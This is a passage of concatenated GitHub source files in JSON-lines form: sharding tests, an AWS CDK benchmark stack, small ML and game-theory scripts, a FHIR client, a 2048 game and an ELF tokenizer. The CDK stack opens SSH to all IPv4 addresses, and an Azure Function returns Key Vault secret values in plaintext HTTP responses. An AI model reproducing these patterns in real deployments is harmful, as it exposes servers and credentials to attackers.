meshes\n for i, mesh_shape in enumerate([(4, 1), (1, 4)]):\n device_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])\n state, hlo_ir, objective = self.run_n_layer_conv(\n num_layers, batch_size, image_size, channel, device_mesh)\n\n assert_data_parallel_cost(state, hlo_ir, objective, device_mesh,\n self.as_option, i)\n\n def test_n_layer_conv_model_parallel(self):\n batch_size = 8\n image_size = 16\n num_layers = 4\n channel = 256\n\n # Test on different device meshes\n for i, mesh_shape in enumerate([(4, 1), (1, 4)]):\n device_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])\n state, hlo_ir, 
objective = self.run_n_layer_conv(\n num_layers, batch_size, image_size, channel, device_mesh)\n\n n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (\n count_communication_primitives(hlo_ir,\n ignore_scalar_all_reduce=True))\n\n assert n_all_reduce == num_layers - 1\n assert n_total == n_all_reduce\n\n def test_n_layer_conv_2d_mesh(self):\n batch_size = 8\n image_size = 32\n num_layers = 4\n channel = 8\n self.as_option.allow_mixed_mesh_shape = False\n\n device_mesh = self.get_device_mesh([2, 2], [1, 1], [1, 0.1])\n state, hlo_ir, objective = self.run_n_layer_conv(\n num_layers, batch_size, image_size, channel, device_mesh)\n\n # Check numbers of communication primitives\n n_total, n_all_reduce, n_all_gather, n_reduce_scatter, n_all_to_all = (\n count_communication_primitives(hlo_ir,\n ignore_scalar_all_reduce=True))\n if self.as_option.prefer_reduce_scatter:\n assert n_reduce_scatter > 0\n if self.as_option.allow_mixed_mesh_shape:\n assert n_all_to_all > 0\n\n def test_n_layer_conv_2d_mesh_mixed_shape(self):\n self.as_option.allow_mixed_mesh_shape = True\n self.test_n_layer_conv_2d_mesh()\n\n def test_n_layer_conv_data_parallel_reduce_scatter(self):\n self.as_option.prefer_reduce_scatter = True\n self.test_n_layer_conv_data_parallel()\n\n def test_n_layer_conv_2d_mesh_mixed_shape_reduce_scatter(self):\n self.as_option.allow_mixed_mesh_shape = True\n self.as_option.prefer_reduce_scatter = True\n self.test_n_layer_conv_2d_mesh()\n\n def test_n_layer_depthwise_conv_model_parallel(self):\n batch_size = 4\n image_size = 8\n num_layers = 2\n channel = 256\n\n # Test on different device meshes\n for i, mesh_shape in enumerate([(4, 1), (1, 4)]):\n device_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])\n state, hlo_ir, objective = self.run_n_layer_conv(num_layers,\n batch_size,\n image_size,\n channel,\n device_mesh,\n is_depthwise=True)\n\n n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (\n count_communication_primitives(hlo_ir,\n ignore_scalar_all_reduce=True))\n assert n_all_reduce == 1\n assert n_total == n_all_reduce\n\n\ndef suite():\n suite = unittest.TestSuite()\n\n def add(name):\n suite.addTest(AutoShardingConvTest(name))\n\n add(\"test_n_layer_conv_data_parallel\")\n add(\"test_n_layer_conv_model_parallel\")\n add(\"test_n_layer_conv_2d_mesh\")\n add(\"test_n_layer_conv_2d_mesh_mixed_shape\")\n\n add(\"test_n_layer_conv_data_parallel_reduce_scatter\")\n add(\"test_n_layer_conv_2d_mesh_mixed_shape_reduce_scatter\")\n\n add(\"test_n_layer_depthwise_conv_model_parallel\")\n\n return suite\n\n\nif __name__ == \"__main__\":\n runner = unittest.TextTestRunner()\n runner.run(suite())\n","repo_name":"alpa-projects/alpa","sub_path":"tests/shard_parallel/test_conv.py","file_name":"test_conv.py","file_ext":"py","file_size_in_byte":11219,"program_lang":"python","lang":"en","doc_type":"code","stars":2855,"dataset":"github-code","pt":"5"} +{"seq_id":"36808113180","text":"import os.path\nfrom aws_cdk.aws_s3_assets import Asset\nfrom aws_cdk import (\n aws_ec2 as ec2,\n aws_iam as iam,\n core\n)\n\ndirname = os.path.dirname(__file__)\n\nclass PhpMysqlBenchStack(core.Stack):\n\n def __init__(self, scope: core.Construct, id: str, vpc, **kwargs) -> None:\n super().__init__(scope, id, **kwargs)\n \n amzn_linux = ec2.MachineImage.latest_amazon_linux(\n generation=ec2.AmazonLinuxGeneration.AMAZON_LINUX_2,\n edition=ec2.AmazonLinuxEdition.STANDARD,\n virtualization=ec2.AmazonLinuxVirt.HVM,\n storage=ec2.AmazonLinuxStorage.GENERAL_PURPOSE\n )\n \n # Allow to be managed via SSM\n 
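# Editor's note — a compact sketch of the mutable batch-stats update that the training
# step above relies on, assuming flax and jax are installed; the model and input are
# toy placeholders for illustration.
import jax
import jax.numpy as jnp
from flax import linen as nn

class Tiny(nn.Module):
    @nn.compact
    def __call__(self, x, train=True):
        return nn.BatchNorm(use_running_average=not train)(x)

model = Tiny()
x = jnp.ones((4, 3))
variables = model.init(jax.random.PRNGKey(0), x)
out, new_state = model.apply(variables, x, mutable=['batch_stats'])
# new_state['batch_stats'] carries the updated running statistics,
# which the TrainState then stores via apply_gradients(batch_stats=...)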
\n role = iam.Role(self, \"InstanceSSM\", assumed_by=iam.ServicePrincipal(\"ec2.amazonaws.com\"))\n role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name(\"service-role/AmazonEC2RoleforSSM\"))\n \n ## Setup key_name for EC2 instance login if you don't use Session Manager\n ## Create keypair in AWS console\n ## Change .any_ipv4 to a specific IP address/range to reduce attack surface\n\n #key_name = \"{keypair}\"\n #apachephp.allow_ssh_access_from(ec2.Peer.any_ipv4())\n #apachephp.allow_ssh_access_from(ec2.Peer.ipv4('10.44.0.0/24'))\n #apachephp.instance.instance.add_property_override(\"KeyName\", key_name)\n \n mySecurityGroup = ec2.SecurityGroup(\n self,\n 'ApachePHP SecurityGroup',\n vpc=vpc,\n security_group_name=\"apachephp-ssh-access-sg\",\n description= 'Allow ssh and http/https access to ec2 instances from anywhere',\n allow_all_outbound=True\n )\n \n apachephp = ec2.Instance(\n self,\n id=\"LoadGen\",\n vpc=vpc,\n vpc_subnets={\"subnet_type\": ec2.SubnetType.PUBLIC},\n instance_name=\"ApachePHP\",\n instance_type=ec2.InstanceType(\"m5.xlarge\"),\n machine_image=amzn_linux,\n role = role,\n security_group = mySecurityGroup\n )\n \n # lock down and change from any_ipv() to ipv4('CIDR') based on your network\n # do not leave this wide open as below.\n \n mySecurityGroup.add_ingress_rule(ec2.Peer.any_ipv4(), ec2.Port.tcp(22), 'allow public ssh access')\n mySecurityGroup.add_ingress_rule(ec2.Peer.any_ipv4(), ec2.Port.tcp(80), 'allow public http access')\n mySecurityGroup.add_ingress_rule(ec2.Peer.any_ipv4(), ec2.Port.tcp(443), 'allow public https access')\n \n asset = Asset(self, \"Asset\", path=os.path.join(dirname, \"assets/http_deploy.sh\"))\n local_path = apachephp.user_data.add_s3_download_command(\n bucket=asset.bucket,\n bucket_key=asset.s3_object_key\n )\n \n apachephp.user_data.add_execute_file_command(file_path=local_path)\n asset.grant_read(apachephp.role)\n\n \n\n\n ec2.CfnEIP(self, id=\"ApachePHPHostEIP\", domain=\"vpc\", instance_id=apachephp.instance_id)\n \n core.CfnOutput(\n self,\n id=\"ApachePHPPrivateIP\",\n value=apachephp.instance_private_ip,\n description=\"APACHE PHP Private IP\",\n export_name=f\"{self.region}:{self.account}:{self.stack_name}:apachephp-private-ip\"\n )\n\n core.CfnOutput(\n self,\n id=\"ApachePHPPublicIP\",\n value=apachephp.instance_public_ip,\n description=\"APACHEPHP Public IP\",\n export_name=f\"{self.region}:{self.account}:{self.stack_name}:apachephp-public-ip\"\n )\n \n","repo_name":"094459/devday-graviton","sub_path":"benchmark/php-mysql/php_mysql_bench/php_mysql_bench_stack.py","file_name":"php_mysql_bench_stack.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9507082696","text":"import sys\nimport numpy as np \nimport tensorflow as tf \nx=list(sys.argv[3].split(\",\"))\ny=list(sys.argv[2].split(\",\"))\ndaysleft=int(sys.argv[1])\nfor i in range(len(x)):\n x[i]=float(x[i])\n y[i]=float(y[i])\n\npre=np.arange(1,daysleft+1)\n#print(\"x=\",x,\" y=\",y)\nn = len(x)\nX = tf.placeholder(\"float\") \nY = tf.placeholder(\"float\") \nW = tf.Variable(np.random.randn(), name = \"W\") \nb = tf.Variable(np.random.randn(), name = \"b\") \nlearning_rate = 0.01\ntraining_epochs = 1000\ny_pred = tf.add(tf.multiply(X, W), b) \n\ncost = tf.reduce_sum(tf.pow(y_pred-Y, 2)) / (2 * n) \n\n# Gradient Descent Optimizer \noptimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost) \n\ninit = tf.global_variables_initializer() 
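# Training loop: run one gradient-descent step per (x, y) pair each epoch; the cost is recomputed every 50 epochs.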
\n\nwith tf.Session() as sess: \n \n\tsess.run(init) \n \n\tfor epoch in range(training_epochs): \n \n\t\tfor (_x, _y) in zip(x, y): \n\t\t\tsess.run(optimizer, feed_dict = {X : _x, Y : _y}) \n\t\tif (epoch + 1) % 50 == 0: \n\t\t\tc = sess.run(cost, feed_dict = {X : x, Y : y}) \n\t\t\t# print(\"Epoch\", (epoch + 1), \": cost =\", c, \"W =\", sess.run(W), \"b =\", sess.run(b)) \n\t\n\ttraining_cost = sess.run(cost, feed_dict ={X: x, Y: y}) \n\tweight = sess.run(W) \n\tbias = sess.run(b)\npredictions=[]\nfor j in range(daysleft):\n predictions.append(weight * pre[j] + bias)\n\nprint(predictions)\nsys.stdout.flush()\n\n\n","repo_name":"Tarun-Narain/Electricity-Management-System","sub_path":"AWS EC2 (AMI) With GPU (Tensorflow)/tfmodel.py","file_name":"tfmodel.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"5"} +{"seq_id":"40674046584","text":"import time\n\nimport numpy as np\nfrom cvxopt import matrix, solvers\nfrom scipy.optimize import linprog\n\n\n# warnings.filterwarnings('ignore', '.*Ill-conditioned*')\n\n\ndef linprog_solver_row(value_matrix, precision=4):\n value_matrix = np.nan_to_num(np.round(value_matrix, precision))\n m, n = value_matrix.shape\n\n # solve col\n # objectif vector c is 0*x1+0*x2+...+0*xn+v\n C = []\n for i in range(n):\n C.append(0)\n C.append(-1)\n A = []\n for i_col in range(n):\n col = value_matrix[:, i_col]\n constraint_row = []\n for item in col:\n constraint_row.append(-item)\n constraint_row.append(1)\n A.append(constraint_row)\n B = []\n for i in range(m):\n B.append(0)\n\n A_eq = []\n A_eq_row = []\n for i in range(n):\n A_eq_row.append(1)\n A_eq_row.append(0)\n A_eq.append(A_eq_row)\n B_eq = [1]\n\n bounds = []\n for i in range(n):\n bounds.append((0, 1))\n bounds.append((None, None))\n\n options = {'cholesky': False,\n 'sym_pos': False,\n 'lstsq': True,\n 'presolve': True},\n\n res = linprog(C, A_ub=A, b_ub=B, A_eq=A_eq, b_eq=B_eq, bounds=bounds,\n options={'cholesky': False,\n 'sym_pos': False,\n 'lstsq': True,\n 'presolve': True})\n policy = res['x'][:-1]\n for i, p in enumerate(policy):\n if p < 10e-8:\n policy[i] = 0\n return policy, -res['fun']\n\n\ndef linprog_solver_col(value_matrix, precision=4):\n policy, value = linprog_solver_row(-value_matrix.T, precision)\n return policy, -value\n\n\ndef value_solve(value_matrix, precision=4):\n value_matrix = np.round(value_matrix, precision)\n _, value = cvxpot_solve_row(value_matrix)\n return value\n\n\ndef linprog_solve(value_matrix, precision=4):\n # rps = nash.Game(np.array(value_matrix))\n # eqs = rps.support_enumeration()\n value_matrix = np.round(value_matrix, precision)\n #py, value = cvxpot_solve_col(value_matrix)\n #px, v2 = cvxpot_solve_row(value_matrix)\n py, value = linprog_solver_col(value_matrix, precision)\n px, _ = linprog_solver_row(value_matrix, precision)\n for i, x in enumerate(px):\n if np.fabs(x) < 10e-6:\n px[i] = 0\n for i, y in enumerate(py):\n if np.fabs(y) < 10e-6:\n py[i] = 0\n px = np.divide(px, np.sum(px))\n py = np.divide(py, np.sum(py))\n # if np.sum(px) < 0.99 or np.sum(py) < 0.99:\n # print('divide error')\n # m, n = value_matrix.shape\n # return v2, np.divide(np.ones(m), m), np.divide(np.ones(n), n)\n\n # px = np.divide(px, np.sum(px))\n # px = np.nan_to_num(px)\n # py = np.divide(py, np.sum(py))\n # py = np.nan_to_num(py)\n # policy_x, policy_y = list(eqs)[0]\n # value = rps[policy_x,policy_y][0]\n return value, px, py\n\n\ndef cvxpot_solve_row(matrix):\n result = 
maxmin(matrix)['x']\n value = result[0]\n policy = np.array(result[1:]).reshape((-1,))\n return policy, value\n\n\ndef cvxpot_solve_col(matrix):\n return cvxpot_solve_row(-matrix.T)\n\n\ndef maxmin(A, solver='glpk'):\n solvers.options['show_progress'] = False\n solvers.options['refinement'] = 1\n\n num_vars = len(A)\n # minimize matrix c\n c = [-1] + [0 for i in range(num_vars)]\n c = np.array(c, dtype=\"float\")\n c = matrix(c)\n # constraints G*x <= h\n G = np.matrix(A, dtype=\"float\").T # reformat each variable is in a row\n G *= -1 # minimization constraint\n G = np.vstack([G, np.eye(num_vars) * -1]) # > 0 constraint for all vars\n new_col = [1 for i in range(num_vars)] + [0 for i in range(num_vars)]\n G = np.insert(G, 0, new_col, axis=1) # insert utility column\n G = matrix(G)\n h = ([0 for i in range(num_vars)] +\n [0 for i in range(num_vars)])\n h = np.array(h, dtype=\"float\")\n h = matrix(h)\n # contraints Ax = b\n A = [0] + [1 for i in range(num_vars)]\n A = np.matrix(A, dtype=\"float\")\n A = matrix(A)\n b = np.matrix(1, dtype=\"float\")\n b = matrix(b)\n sol = solvers.lp(c=c, G=G, h=h, A=A, b=b, solver=solver, options={'glpk': {'msg_lev': 'GLP_MSG_OFF'}}\n )\n return sol\n\n\ndef run():\n v = [\n [1., 2., 3.], [4., 5., 6.], [7., 8., 9.]\n ]\n v = np.array(v)\n # policy_x, value_x = __linprog_solver_row(v)\n # policy_y, value_y = __linprog_solver_col(v)\n start = time.time()\n # linv, linx, liny = linprog_solve(v)\n linx, linv = linprog_solver_row(v)\n liny, _ = linprog_solver_col(v)\n\n print(time.time() - start)\n start = time.time()\n\n px, value = cvxpot_solve_row(v)\n py, value = cvxpot_solve_col(v)\n px, value = cvxpot_solve_row(v*2)\n py, value = cvxpot_solve_col(v*2)\n px, value = cvxpot_solve_row(v*4)\n py, value = cvxpot_solve_col(v*4)\n px, value = cvxpot_solve_row(v*9)\n py, value = cvxpot_solve_col(v*9)\n px, value = cvxpot_solve_row(v*2.5)\n py, value = cvxpot_solve_col(v*2.5)\n print(time.time() - start)\n print('done')","repo_name":"qifanz/soft-nash-q2","sub_path":"util/matrix_game_solver.py","file_name":"matrix_game_solver.py","file_ext":"py","file_size_in_byte":5022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3979051900","text":"# encoding=utf-8\n\nimport unittest\nfrom Roles.Role import Role, RoleCreatorWithLogger\nfrom Roles.Logger import Logger\nfrom six import with_metaclass\n\n__author__ = 'mochenx'\n\n\nclass UselessSubclassOfRole(with_metaclass(RoleCreatorWithLogger, Role, Logger)):\n index = 0\n\n def __init__(self, **kwargs):\n super(UselessSubclassOfRole, self).__init__(**kwargs)\n self.index = UselessSubclassOfRole.index\n UselessSubclassOfRole.index += 1\n\n def get_index(self):\n return self.index\n\n @classmethod\n def create(cls):\n return UselessSubclassOfRole()\n\n\nclass Grandfather(with_metaclass(RoleCreatorWithLogger, Role, Logger)):\n\n @classmethod\n def create(cls):\n return Grandfather()\n\n\nclass GrandMother(with_metaclass(RoleCreatorWithLogger, Role, Logger)):\n\n @classmethod\n def create(cls):\n return GrandMother()\n\n\nclass Father(Grandfather):\n\n def __init__(self, **kwargs):\n super(Father, self).__init__(**kwargs)\n\n @classmethod\n def create(cls):\n return Father()\n\n\nclass Son(Father):\n new_property_cnt = 0\n\n def __init__(self, **kwargs):\n super(Son, self).__init__(**kwargs)\n\n @classmethod\n def create(cls):\n if cls.new_property('age'):\n cls.new_property_cnt += 1\n if cls.new_property('score'):\n cls.new_property_cnt += 1\n return Son()\n\n\nclass 
UTRole(unittest.TestCase):\n def check_subclass_of_role(self, inst, klass):\n print('Checking all attributes of {0} and its instances to ensure '\n 'subclassing is done correctly'.format(klass.__name__))\n self.assertTrue(isinstance(inst, klass))\n self.assertTrue(issubclass(klass, Role))\n self.assertTrue(issubclass(klass, Logger))\n self.assertTrue(hasattr(inst, 'debug'))\n self.assertTrue(hasattr(inst, 'logger'))\n self.assertTrue(hasattr(inst, 'set_logger'))\n\n def test_register(self):\n useless_role = Role.get('UselessSubclassOfRole')\n role0 = Role.get('Grandfather')\n role1 = Role.get('GrandMother')\n role00 = Role.get('Father')\n role000 = Role.get('Son')\n\n self.check_subclass_of_role(useless_role, UselessSubclassOfRole)\n self.check_subclass_of_role(role0, Grandfather)\n self.check_subclass_of_role(role1, GrandMother)\n self.check_subclass_of_role(role00, Father)\n self.check_subclass_of_role(role000, Son)\n\n def test_get(self):\n duts = [Role.get('UselessSubclassOfRole') for _ in range(5)]\n for i, dut in enumerate(duts):\n print('Checking the {0} DUT whose index is {1}'.format(i, dut.get_index()))\n self.assertEqual(i, dut.get_index())\n\n def test_new_property(self):\n duts = [Role.get('Son') for _ in range(10)]\n dut = duts[0]\n self.assertTrue(hasattr(dut, 'age'))\n self.assertTrue(hasattr(dut, 'score'))\n self.assertIsNone(dut.age)\n self.assertIsNone(dut.score)\n dut.age = 10\n dut.score = 99\n self.assertEqual(dut.age, 10)\n self.assertEqual(dut.score, 99)\n self.assertEqual(dut._age, 10)\n self.assertEqual(dut._score, 99)\n print('Age: {0}, Score: {1}'.format(dut.age, dut.score))\n dut._age = 11\n dut._score = 98\n self.assertEqual(dut.age, 11)\n self.assertEqual(dut.score, 98)\n print('Age: {0}, Score: {1}'.format(dut.age, dut.score))\n self.assertEqual(dut.new_property_cnt, 2)\n print('new_property in class has been called {0} times'.format(dut.new_property_cnt))\n\n\n\n","repo_name":"Mochenx/Anteater","sub_path":"UTs/UTRole.py","file_name":"UTRole.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18529006349","text":"import urllib.request\nimport json\nimport fhirclient.models.bundle as b\nimport fhirclient.models.patient as p\nimport fhirclient.models.observation as o\nimport fhirclient.models.medicationstatement as ms\nclass Client:\n\n def getPatientById(self,id):\n url =\"http://hapi.fhir.org/baseDstu3/Patient/\"+str(id)\n contents = urllib.request.urlopen(url).read()\n js = json.loads(contents.decode(\"utf-8\"))\n return p.Patient(js)\n def getObservationById(self,id):\n url =\"http://hapi.fhir.org/baseDstu3/Observation/\"+str(id)\n contents = urllib.request.urlopen(url).read()\n js = json.loads(contents.decode(\"utf-8\"))\n return o.Observation(js)\n def getMedicationStatement(self,id):\n url =\"http://hapi.fhir.org/baseDstu3/MedicationStatement/\"+str(id)\n contents = urllib.request.urlopen(url).read()\n js = json.loads(contents.decode(\"utf-8\"))\n return ms.MedicationStatement(js)\n def getAllPatients(self,count=7,offset=3,family=\"\"):\n contents = urllib.request.urlopen(\"http://hapi.fhir.org/baseDstu3/Patient?family=\" + str(family) + \"&_getpagesoffset=\" + str(offset) + \"&_count=\" + str(count) + \"&_pretty=true\").read()\n js = json.loads(contents.decode(\"utf-8\"))\n bundle = b.Bundle(js)\n patients = []\n if(bundle.entry is None):\n return []\n for entry in bundle.entry:\n patients.append(entry.resource)\n return patients\n def 
getItemsForPatient(self,id,what=\"MedicationStatement\"):\n url =\"http://hapi.fhir.org/baseDstu3/\"+what+\"?patient=\"+str(id)+\"&_pretty=true\"\n contents = urllib.request.urlopen(url).read()\n js = json.loads(contents.decode(\"utf-8\"))\n bundle = b.Bundle(js)\n items =[ ]\n if(bundle.entry is None):\n return []\n for entry in bundle.entry:\n items.append(entry.resource)\n return items\n","repo_name":"mlynarzsrem/IWM","sub_path":"Karta pacjenta/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9276767400","text":"import unittest\n\nfrom python.src.y2020.dec02 import Dec02\n\n\nclass TestDec02(unittest.TestCase):\n data = [\n \"1-3 a: abcde\",\n \"1-3 b: cdefg\",\n \"2-9 c: ccccccccc\"\n ]\n\n def test_old_policy(self):\n d = Dec02(instructions=self.data)\n self.assertEqual(2, d.part_1())\n\n def test_new_policy(self):\n d = Dec02(instructions=self.data)\n self.assertEqual(1, d.part_2())\n","repo_name":"prositen/advent-of-code","sub_path":"python/test/y2020/test_dec02.py","file_name":"test_dec02.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"5"} +{"seq_id":"15168084808","text":"import logging\nimport json\n\nimport azure.functions as func\nfrom azure.keyvault.secrets import SecretClient\nfrom azure.identity import DefaultAzureCredential\n\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n logging.info('Python HTTP trigger function processed a request.')\n name = req.params.get('name')\n if not name:\n return func.HttpResponse(\"Bad request you need to pass name\", status_code=400)\n credential = DefaultAzureCredential()\n logging.info('DefaultAzureCredential')\n kv = \"VaronisAssignmentKv01\", \"VaronisAssignmentKv02\", \"VaronisAssignmentKv03\"\n response = []\n for keyVaultName in kv:\n KVUri = f\"https://{keyVaultName}.vault.azure.net\"\n client = SecretClient(vault_url=KVUri, credential=credential)\n try:\n data = client.get_secret(name)\n response.append({'keyVaultName': keyVaultName, 'secretName': name, 'secretValue': data.value,\n 'createdOn': data.properties.created_on.isoformat()})\n logging.info(\n f'Keyvault Name: {keyVaultName}\\nSecret name: {name}\\nSecret value: {data.value}\\nSecret created on: {data.properties.created_on}\\n')\n except Exception as e:\n response.append({'keyVaultName': keyVaultName, 'secretName': name, 'error': str(e)})\n client.close()\n return func.HttpResponse(json.dumps(response))\n","repo_name":"karolgkrupa/VaronisTest","sub_path":"2/pythonSecret/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70676771919","text":"#! 
/usr/bin/python\n# -*- coding:utf-8 -*-\n\n# Data handling: transform the board data according to the player's move\n\nimport random as r\nimport sys\n\nsquare = (2, 2, 2, 4)\n\n\ndef prime_data():\n    # Initial layout: place two starting tiles at random positions\n    data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n    pp = r.choice(square)\n    pp1 = r.choice(square)\n    location = r.sample([i for i in range(16)], 2)\n    data[location[0]] = pp\n    data[location[1]] = pp1\n    return data\n\n\ndef tran_data(data, n):\n    # Split the board into 4 small lists according to the move\n    # The side opposite to the move direction is the base row zero\n    small_list = []\n    # print(data)\n    if n == 0: # move up\n        for i in range(4):\n            zero = [data[i], data[i + 4], data[i + 8], data[i + 12]]\n            small_list.append(zero)\n    elif n == 1: # move right\n        zero = data[0:4][::-1]\n        one = data[4:8][::-1]\n        two = data[8:12][::-1]\n        three = data[12:16][::-1]\n        small_list = [three, two, one, zero]\n    elif n == 2: # move down\n        for i in range(12, 16):\n            zero = [data[i], data[i - 4], data[i - 8], data[i - 12]]\n            small_list.append(zero)\n    elif n == 3: # move left\n        zero = data[:4]\n        one = data[4:8]\n        two = data[8:12]\n        three = data[12:]\n        small_list = [three, two, one, zero]\n    return small_list\n\n\ndef add_number(data, n):\n    # Merge step: collapse equal neighbouring tiles in each small list\n    lis = []\n    small_list = tran_data(data, n)\n    for p in small_list:\n        try:\n            for x in range(4):\n                p.remove(0)\n        except ValueError:\n            pass\n        while True:\n            s = len(p)\n            if s < 4:\n                p.append(0)\n            else:\n                break\n        if p[0] == p[1]:\n            if p[2] == p[3]:\n                p[0] += p[1]\n                p[1] = p[2] + p[3]\n                p[2], p[3] = 0, 0\n            else:\n                p[0] += p[1]\n                p[1], p[2], p[3] = p[2], p[3], 0\n        elif p[2] == p[1]:\n            p[1] += p[2]\n            p[2], p[3] = p[3], 0\n        elif p[2] == p[3]:\n            p[2] += p[3]\n            p[3] = 0\n        lis.append(p)\n    data = tran_list(lis, n)\n    return data\n\n\ndef tran_list(small_list, n):\n    big_list = []\n    if n == 0:\n        for x in range(4):\n            for i in range(4):\n                big_list.append(small_list[i][x])\n    elif n == 1:\n        for i in [3, 2, 1, 0]:\n            s = small_list[i][::-1]\n            for x in s:\n                big_list.append(x)\n\n    elif n == 2:\n        for x in range(4):\n            for i in [3, 2, 1, 0]:\n                big_list.append(small_list[i][x])\n        big_list = big_list[::-1]\n    elif n == 3:\n        for i in [3, 2, 1, 0]:\n            for x in small_list[i]:\n                big_list.append(x)\n\n    return big_list\n\n\ndef judgement(big_list):\n    # Spawn a new tile on a random empty cell and update the board\n    s = []\n    for i in range(16):\n        if not big_list[i]:\n            p = i\n            s.append(p)\n    try:\n        l = r.choice(square)\n        z = r.choice(s)\n    except (ValueError, IndexError):\n        s = input(\"Game over, press any key to exit\")\n        raise NameError(\" Game over!\")\n    big_list[z] = l\n    return big_list\n\n\ndef data_handle(data):\n    n = input(\"W A S D (up/down/left/right) --->\")\n    if len(n) > 1:\n        n = n[-1]\n    if n in (\"w\"):\n        # swipe up\n        data = add_number(data, 0)\n    elif n in (\"d\"):\n        # swipe right\n        data = add_number(data, 1)\n    elif n in (\"s\"):\n        # swipe down\n        data = add_number(data, 2)\n    elif n in (\"a\"):\n        # swipe left\n        data = add_number(data, 3)\n    elif n in \"q\":\n        raise OSError\n    else:\n        raise StopIteration(\"Please enter a valid key\")\n    data = judgement(data)\n    return data # return the board to the game UI\n\n\ndef read_data(filename=\"archive.txt\"):\n    s = []\n    try:\n        file = open(filename)\n        for i in file:\n            p = i.strip()\n            pp = int(p)\n            s.append(pp)\n        file.close()\n    except OSError:\n        print(\"Failed to open the file\")\n    return s\n\n\ndef save_data(data, filename=\"archive.txt\"):\n    try:\n        file = open(filename, \"w\")\n        for i in data:\n            file.write(str(i))\n            file.write(\"\\n\")\n        file.close()\n    except OSError:\n        print(\"Error opening the file\")\n\n","repo_name":"Laurel-rao/csdn_demo","sub_path":"game_2048/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"14472071602","text":"import math\n\nfrom .shapes import 
PolygonShape\n\n\nclass Triangle(PolygonShape):\n def __init__(self, *sides: list):\n if not all(isinstance(side, (int, float)) for side in sides):\n raise ValueError(\"Sides must be only of type int or float.\")\n if len(sides) != 3:\n raise ValueError(\"Triangle must have 3 sides.\")\n if sides[0] <= 0 or sides[1] <= 0 or sides[2] <= 0:\n raise ValueError(\"Sides must be positive numbers.\")\n if (\n sides[0] >= sides[1] + sides[2]\n or sides[1] >= sides[0] + sides[2]\n or sides[2] >= sides[0] + sides[1]\n ):\n raise ValueError(\n \"Sum of two sides of a triangle must be greater than third side.\"\n )\n super().__init__(*sides)\n\n @property\n def two_smaller_sides(self):\n if self.max_side:\n return [side for side in self.all_sides if side != self.max_side]\n\n @property\n def is_right_triangle(self):\n if self.max_side:\n return self.max_side**2 == sum(\n side**2 for side in self.two_smaller_sides\n )\n else:\n return False\n\n @property\n def area(self):\n if self.is_right_triangle:\n return math.prod(self.two_smaller_sides) / 2\n return math.sqrt(\n self.semiperimeter\n * (self.semiperimeter - self.all_sides[0])\n * (self.semiperimeter - self.all_sides[1])\n * (self.semiperimeter - self.all_sides[2])\n )\n","repo_name":"Aleksandr-Mamonov/geometry_lib","sub_path":"geometry_lib/triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"3378207548","text":"import glob\nimport json\nimport os\nimport random\nimport re\nimport sys\nimport argparse\n\nfrom capstone import *\nfrom elftools.elf.elffile import ELFFile\n\n# from command import params\nclass params:\n fields = ['static', 'inst_emb', 'inst_pos_emb', 'arch_emb', 'byte1', 'byte2', 'byte3', 'byte4', 'arg_info']\n\ndef tokenize(s):\n s = s.replace(',', ' , ')\n s = s.replace('[', ' [ ')\n s = s.replace(']', ' ] ')\n s = s.replace(':', ' : ')\n s = s.replace('*', ' * ')\n s = s.replace('(', ' ( ')\n s = s.replace(')', ' ) ')\n s = s.replace('{', ' { ')\n s = s.replace('}', ' } ')\n s = s.replace('#', '')\n s = s.replace('$', '')\n s = s.replace('!', ' ! 
')\n\n s = re.sub(r'-(0[xX][0-9a-fA-F]+)', r'- \\1', s)\n s = re.sub(r'-([0-9a-fA-F]+)', r'- \\1', s)\n\n return s.split()\n\n\ndef get_function_reps(die, mapping):\n functions = []\n for child_die in die.iter_children():\n\n if child_die.tag.split('_')[-1] == 'subprogram':\n function = {}\n try:\n function['start_addr'] = child_die.attributes['DW_AT_low_pc'][2]\n function['end_addr'] = function['start_addr'] + child_die.attributes['DW_AT_high_pc'][2]\n function['name'] = child_die.attributes['DW_AT_name'][2].decode('utf-8')\n functions.append(function)\n except KeyError:\n continue\n\n return functions\n\n\ndef get_type(type_str, agg):\n\n if '*' in type_str:\n return get_type(type_str.replace('*', ''), agg)+'*'\n elif '[' in type_str and ']' in type_str:\n return 'array'\n elif agg['is_enum']:\n return 'enum'\n elif agg['is_struct']:\n return 'struct'\n elif agg['is_union']:\n return 'union'\n elif 'void' in type_str:\n return 'void'\n\n elif 'float' in type_str:\n return 'float'\n elif 'long' in type_str and 'double' in type_str:\n return 'long double'\n elif 'double' in type_str:\n return 'double'\n\n elif 'char' in type_str:\n if 'u' in type_str:\n return 'unsigned char'\n return 'signed char'\n elif 'short' in type_str:\n if 'u' in type_str:\n return 'unsigned short'\n return 'signed short'\n elif 'int' in type_str:\n if 'u' in 